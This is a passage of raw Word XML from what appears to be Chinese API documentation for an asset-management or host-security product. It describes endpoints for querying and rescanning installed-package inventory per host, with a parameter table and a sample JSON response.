        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D97D99C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45843E57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D58756E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>1.安装</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2.安装</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>扫描</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3.安装</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459DF765" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5828B009" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用安装</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF63B03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2042B197" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A3BCFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc115166144"/>
      <w:bookmarkStart w:id="140" w:name="安装包信息查询结果"/>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w14:paraId="5995BBD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询安装包信息，按每台主机每个安装包进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60539B44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02786516" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/pkg/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCAA740"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671"/>
        <w:gridCol w:w="1279"/>
        <w:gridCol w:w="442"/>
        <w:gridCol w:w="6690"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="68D1E6B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C7F2D2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35F4E98C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FB05D61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BFB0A95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4EF6C865" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="578E0786" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EC38D39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F0DB2FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B97F09F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4ED111FC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C72B337" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07522DBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76B1365F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="077FD9BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0ED5D7ED" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45ABC0B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="690D3A51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B832FB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32CA1D61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="28E9E5B0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CC94FBA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="120467FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E163172" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4473C8C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="48695421" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="301D6CA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73DE02BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="271BA563" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AA49EB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>安装包名</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="154F180A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BCD4FAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E7689F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0496EA8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CB0CA56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装类型（仅Linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12289652" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="165A0676" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>installTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16B693A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="754ACBF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="517F0D28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F9B8DC9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A1B72A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>publisher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A0A203F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0183F7D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EC7BC9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>软件发布者(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C09C1AA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D9B002E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E62CC57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F45E119" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46D95E76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装路径(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2FB5BDE7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5766B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>productVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D0C0053" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30755070" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F9B9BD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装版本(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="69A8B8B4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A430EFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>psize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29A342CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Ingeter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7746771B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65542F55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>psize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1,pkgSize=[0,1MB];</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>psize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">=2,pkgSize=[1,10MB]; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>psize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">=3,pkgSize=[10,100MB]; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>psize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=4,pkgSize=[100,1024MB];</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>psize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=5,pkgSize=[1024,MB]; （仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08C2AFA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9607A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/pkg/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4156F4BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF827B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "im-chooser",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "summary": "Desktop Input Method configuration tool ",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version": "1.3.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
